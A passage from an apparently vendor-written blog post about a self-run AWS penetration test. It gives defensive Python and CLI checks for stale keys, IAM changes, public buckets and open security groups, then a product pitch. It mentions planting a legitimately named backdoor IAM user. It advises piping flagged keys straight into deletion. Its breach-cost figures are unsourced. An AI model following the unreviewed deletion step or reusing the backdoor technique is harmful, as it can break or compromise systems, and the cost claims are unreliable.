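A stale-key sweep is easy to automate. Here's a minimal sketch (the helper is hypothetical, but the dict shape mirrors the `AccessKeyMetadata` entries that `aws iam list-access-keys` returns) that flags active keys older than a cutoff:

```python
from datetime import datetime, timedelta, timezone

def find_stale_access_keys(keys, max_age_days=90, now=None):
    """Return active access keys older than max_age_days.

    `keys` mirrors the AccessKeyMetadata shape from
    `aws iam list-access-keys`: UserName, AccessKeyId, Status, CreateDate.
    """
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=max_age_days)
    return [
        k for k in keys
        if k["Status"] == "Active" and k["CreateDate"] < cutoff
    ]
```

Feed it the real API response on a schedule, and pipe anything it flags straight into `aws iam delete-access-key` - that's the deletion step most "rotation" processes skip.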

2. Legitimate-Looking Backdoors Are Undetectable

The backdoor IAM user I created (aws-backup-service-user) looked completely legitimate. It had proper tags, a reasonable name, and limited permissions. Most security audits would skip right over it.

Lesson: Monitor for new IAM entities and require approval workflows for all IAM changes.
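One lightweight way to get that visibility is to filter CloudTrail records for IAM-mutating calls and route them to a review queue. The event names below are real CloudTrail `eventName` values; the helper itself is an illustrative sketch, not a drop-in detector:

```python
# CloudTrail eventName values that create or expand IAM access
WATCHED_EVENTS = {
    "CreateUser", "CreateRole", "CreateAccessKey",
    "AttachUserPolicy", "AttachRolePolicy", "PutUserPolicy",
}

def flag_iam_changes(events):
    """Given CloudTrail records, return those that created or
    modified IAM entities and should go through an approval workflow."""
    return [
        e for e in events
        if e.get("eventSource") == "iam.amazonaws.com"
        and e.get("eventName") in WATCHED_EVENTS
    ]
```

A filter like this would have surfaced my `aws-backup-service-user` backdoor the moment it was created, however legitimate its name looked.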

3. Public S3 Buckets Containing Customer Data

Two S3 buckets containing customer PII and financial data were publicly readable. The buckets were created by developers for “temporary” data exports that became permanent.

Lesson: Implement automated S3 bucket scanning and enforce bucket policies through SCPs.
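Automated scanning can start as simply as checking each `get-bucket-acl` response for grants to AWS's global groups. A minimal sketch, assuming the standard ACL response shape (the group URIs are the real AWS predefined-group identifiers; the function is hypothetical):

```python
# AWS predefined groups that make a bucket world-readable
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def is_bucket_acl_public(acl):
    """True if a get-bucket-acl response grants access to all users."""
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEES:
            return True
    return False
```

Note that ACLs are only one exposure path - bucket policies and Block Public Access settings need the same treatment, which is why enforcing this through SCPs beats scanning alone.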

4. Administrative Permissions Everywhere

5 different IAM entities had unnecessary administrative permissions, including service accounts that only needed read access to specific S3 buckets.

Lesson: Follow principle of least privilege religiously and audit permissions regularly.
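This audit is scriptable too: any inline or attached policy document that allows `*` on `*` is effectively `AdministratorAccess`, whatever it's named. A hedged sketch of such a check against a standard IAM policy document:

```python
def grants_full_admin(policy_document):
    """True if an IAM policy document contains an Allow */* statement."""
    statements = policy_document.get("Statement", [])
    if isinstance(statements, dict):  # single-statement documents
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        if isinstance(actions, str):
            actions = [actions]
        if isinstance(resources, str):
            resources = [resources]
        if "*" in actions and "*" in resources:
            return True
    return False
```

Running this across every user, role, and service account would have caught all 5 of the over-privileged entities in my environment.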

5. The Attack Chain Was Completely Automated

Once I had initial access, the entire compromise could be scripted. An attacker could automate data extraction, persistence establishment, and vulnerability discovery.

Lesson: Defense must be equally automated to match the speed of attacks.
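In practice that means a scheduled job that runs a battery of small check functions over an inventory snapshot and aggregates findings, rather than a human clicking through the console. A minimal, hypothetical harness:

```python
def run_security_checks(inventory, checks):
    """Run every check over an inventory snapshot and collect findings.

    Each check is a (name, fn) pair where fn(inventory) returns a list
    of findings (empty when the check passes).
    """
    findings = []
    for name, check in checks:
        for finding in check(inventory):
            findings.append({"check": name, "finding": finding})
    return findings
```

Plug individual detectors (public buckets, stale keys, open security groups) in as checks, run the harness on a schedule, and alert on any non-empty result - the same loop an attacker's tooling runs, pointed the other way.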

How to Protect Yourself: The Complete Defense Strategy

Based on this penetration test, here’s exactly how to protect your startup from these attack vectors:

Immediate Actions (Do Today)

  1. Audit All Credentials
# List each user's access keys, then delete any stale ones
# ($username and $old_key_id are placeholders for your own values)
aws iam list-access-keys --user-name $username
aws iam delete-access-key --user-name $username --access-key-id $old_key_id
  2. Check for Public S3 Buckets
# Dump every bucket's ACL and look for AllUsers grants
aws s3api list-buckets --query 'Buckets[].Name' --output text | xargs -n1 aws s3api get-bucket-acl --bucket
  3. Review Security Groups
# Find security groups open to 0.0.0.0/0
aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'
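The describe-security-groups output can then be post-processed to decide exactly which ingress rules to revoke. A sketch in Python - the rule shape mirrors the EC2 API response, while the port list and helper are my own assumptions:

```python
RISKY_PORTS = (22, 3389)  # SSH and RDP

def rules_to_revoke(security_group):
    """Return ingress rules that expose SSH/RDP to the whole internet.

    `security_group` mirrors one entry of the SecurityGroups array
    returned by `aws ec2 describe-security-groups`.
    """
    revoke = []
    for perm in security_group.get("IpPermissions", []):
        # Absent ports (protocol "-1") mean all traffic; treat as 0-65535
        lo = perm.get("FromPort", 0)
        hi = perm.get("ToPort", 65535)
        covers_risky = any(lo <= p <= hi for p in RISKY_PORTS)
        world_open = any(r.get("CidrIp") == "0.0.0.0/0" for r in perm.get("IpRanges", []))
        if covers_risky and world_open:
            revoke.append(perm)
    return revoke
```

Each returned permission can be passed to `aws ec2 revoke-security-group-ingress --ip-permissions` to close the hole.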

Short-term Security Improvements (This Week)

  1. Implement AWS Config Rules
  2. Enable GuardDuty
  3. Set up CloudTrail with alerting
  4. Review all IAM permissions
  5. Enable MFA for all users

Long-term Security Architecture (This Month)

  1. Implement Zero Trust Architecture
  2. Deploy automated security scanning
  3. Create incident response playbooks
  4. Set up security metrics and dashboards
  5. Regular penetration testing

The Real Cost of Insecure AWS Infrastructure

Based on this penetration test and real-world incident data, here’s what a successful attack against your startup could cost:

Direct Financial Impact

  • Incident Response: $500K - $2M
  • Regulatory Fines: $1M - $20M+ (GDPR, CCPA)
  • Legal Fees: $300K - $1M
  • Forensics and Recovery: $200K - $1M

Business Impact

  • Customer Churn: 30-50% revenue loss
  • Service Downtime: $50K - $500K per day
  • Reputation Damage: 2-5 years to recover
  • Insurance Premium Increases: 300-500%

Total Risk for $5M ARR Startup: $15M - $50M+

Beyond DIY Security: Why Manual Testing Isn’t Enough

While this penetration test revealed critical vulnerabilities, it also highlighted the limitations of manual security approaches:

Time Intensive: This 30-minute test took weeks to plan, execute, and document properly.

Limited Scope: I only tested a fraction of potential attack vectors and configurations.

Point-in-Time: Infrastructure changes daily, making manual tests quickly outdated.

Expertise Required: Most startup teams lack the security expertise to perform comprehensive testing.

No Continuous Monitoring: Manual tests can’t provide the continuous security monitoring that attackers exploit.

This is where PathShield transforms your security approach. Instead of hoping manual security reviews catch vulnerabilities, PathShield provides:

  • Continuous Attack Path Discovery: Automatically identifies attack paths as your infrastructure changes
  • Real-time Vulnerability Detection: Catches security gaps immediately, not weeks later
  • Expert-Built Attack Simulations: Tests your defenses using the same techniques as real attackers
  • Automated Remediation Guidance: Provides specific, actionable fixes for every vulnerability found
  • Compliance Automation: Ensures your security posture meets regulatory requirements 24/7

The attack vectors I used in this test - credential exposure, privilege escalation, data exfiltration - are detected and blocked automatically by PathShield’s intelligent security monitoring.

Ready to stop playing defense and start preventing attacks? Start your free PathShield trial and see how quickly we can identify the attack paths in your AWS environment.

Conclusion: The Wake-Up Call Every Startup Needs

This 30-minute penetration test should be a wake-up call for every startup running on AWS. The speed and ease with which I compromised my own “secure” infrastructure demonstrates that traditional security approaches are fundamentally inadequate.

The most terrifying part? Everything I discovered is completely typical for startup AWS environments. These aren’t exotic vulnerabilities or zero-day exploits - they’re basic security hygiene failures that exist in the majority of growing companies.

Your startup’s AWS security is probably broken. The question isn’t whether you have vulnerabilities - it’s whether you’ll discover them before an attacker does.

What’s your next move?


This post generated significant discussion on LinkedIn and Product Hunt. If you’ve conducted similar security tests or discovered surprising vulnerabilities in your own infrastructure, I’d love to hear about it. Share your experiences in the comments or reach out directly.

Remember: never test these techniques on systems you don’t own, and always get explicit permission before conducting security testing.
